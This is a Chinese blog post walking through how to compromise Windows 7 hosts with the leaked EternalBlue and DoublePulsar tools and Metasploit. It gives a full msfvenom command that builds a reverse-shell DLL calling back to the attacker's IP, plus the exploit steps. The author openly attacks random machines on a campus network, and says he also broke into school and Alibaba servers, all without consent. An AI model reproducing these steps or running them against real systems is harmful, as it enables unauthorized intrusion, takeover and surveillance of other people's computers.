FB+Metasploit入侵win7实例

2017年4月23日00:19:24 发表评论 13,352

FB+Metasploit入侵win7实例

引言

前几天影子经纪人Shadow Brokers黑了方程式黑客组织(网上是这么说的),然后放出了一堆牛逼的工具,这好像向互联网世界投放了一枚核弹,这一堆工具可以主要用来攻击windows系统,主要针对windows xp/7/2008 操作系统,然而现在很多服务仍然使用的是windows系统,这将导致全世界的70%服务器暴露在危险之中,工具发布出来的那一刻,整个互联网都炸了锅,自从之前臭名昭著的MS08-067漏洞之后,这次的漏洞是最大的一个,并且绝不亚于MS08-067,我前几天亲自测试了window server2008和windows7,大部分的机器都是一打一个准,几分钟就能拿到服务器的管理员权限。

再说一下windows7,它几乎是不用来做服务器的,一般都是个人电脑,虽然windows 8和10都已经出来了,但是我个人认为i,win7比后面这两个版本要好用,但不巧,这一堆工具发出来之后,几乎所有的win7都可以轻松被入侵,别人可以轻而易举的监视你的一举一动。

测试环境

攻击机1:windows 7   IP:10.216.50.193

攻击机2:Kali (Ubuntu系统)  IP:10.217.101.17

被攻击者:内网的某台windows7(校园网内网可ping通)

攻击工具

Metasploit (用来生成dll和控制被攻击者)

FB (用来攻击被攻击者漏洞)

LanHelper (扫描内网主机)

开启渗透之旅

1、扫描IP 找到入侵对象

我么首先在我们使用LanHelper在所在的网段扫描一批机器出来

FB+Metasploit入侵win7实例

    如上图,我们已经扫描完一批内网机器,这里要注意一下我们要拿来测试的是win7系统的机器,一般win7系统扫完之后在后面都有WORKGROUP的标志,我们就拿上面的10.216.42.7这个ip下手吧。

被攻击者IP:10.216.42.7

2、和使用fb工具进行攻击测试

    我们首先在fb.py目录下么新建一个listeningposts文件夹,如果没有它工具会报错。还有这个工具需要电脑居右python2.6和pywin32环境,否则是无法运行的。

    打开fb.py,然后进行一系列的配置,填上被攻击者ip和本机ip,在询问是否重定向的地方输入no,因为我们不需要。


FB+Metasploit入侵win7实例

    后面紧接着 的是让输入记录的保存地址,自己输入一个路径然后回车,接着选择新建一个项目,然后输入文件名回车,然后输入 use Enternalblue

FB+Metasploit入侵win7实例

    然后一直回车,一直到提示选择操作系统的地方,然后选择1,回车后选择fb,也就是1

FB+Metasploit入侵win7实例

    到这位置,基本的配置算是完成了,下面一直按回车就好了,一直到下面的位置,然后输入yes或者直接确定

FB+Metasploit入侵win7实例

回车之后就开始进行攻击了,如果成功了就会出现以下界面

FB+Metasploit入侵win7实例

3、使用Metasploit生成dll后门文件并监听连接

    我们首先在kali上面ping一下被攻击者确定可以连接到。。。。我嘞个去,那家伙关机了,ping不通了,我换一个ip:10.216.29.127,上面的操作步骤换下ip就好

被攻击者ip:10.216.29.127

    ok,这次可以ping通了。我们在kali的终端使用命令生成一个dll后门文件,命令如下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.217.101.17  LPORT=5555 -f dll > /opt/my.dll

上面的LHOST=后面填你的kali的ip,LPORT=是我们要监听的端口,生成的文件放在了 /opt/下面。

FB+Metasploit入侵win7实例

    然后将生成的文件拿到window7攻击机的c盘下面,然后启动kali的Metasploit,启动命令是msfconsole,然后一次执行下面的命令

FB+Metasploit入侵win7实例

这样就开始监听5555端口,等待被攻击者的连接。下面继续使用win7攻击机,将刚才生成的dll注入到被攻击者。

4、使用fb的Doublepulsar注入dll

在fb中继续输入命令 use Doublepulsar 然后一直回车知道选择攻击类型和选择目标机位数,选择SMB和x64,如下

FB+Metasploit入侵win7实例

    然后回车再选择2,注入dll文件,输入刚才的dll文件路径c:\my.dll。

FB+Metasploit入侵win7实例

    然后一直回车,知道最后输入yes的运行的命令

FB+Metasploit入侵win7实例

    当看到上面的Succeeded的提示的时候,说明已经注入成功了,这时候可以去kali端查看连接情况了。

5、kali攻击机控制被攻击者

看kali端的l连接情况

FB+Metasploit入侵win7实例

从上面可以看到,被攻击者主动连接了攻击机,此时的kaili攻击机就拿到了控制被攻击者的权限。具体的执行命令这里就不说了,因为我们入侵的是windows7,这里其实已经是管理员权限了,不用再继续提权了。
6、补充

上面的生成的dll文件是64位的,所以在攻击32位的机器的时候是会注入失败的,不过不要紧,只要取消生成命令的时候的x64就可以了,这时候在监听端口的时候也需要监听32位的反弹连接,同样在设置pyload的时候去掉x64就可以了。命令如下

结束语

经过我的多次测试,学校的一些windows2008服务器也存在这种漏洞,并且和容易被渗透进去,阿里的服务器也是,扫了一段2008出来,测试也成功拿到管理员权限,所以说,这款工具简直就是windows的克星、好在微软的补丁已经出来了,使用windows7和2008,2003的小伙伴们赶紧打补丁吧。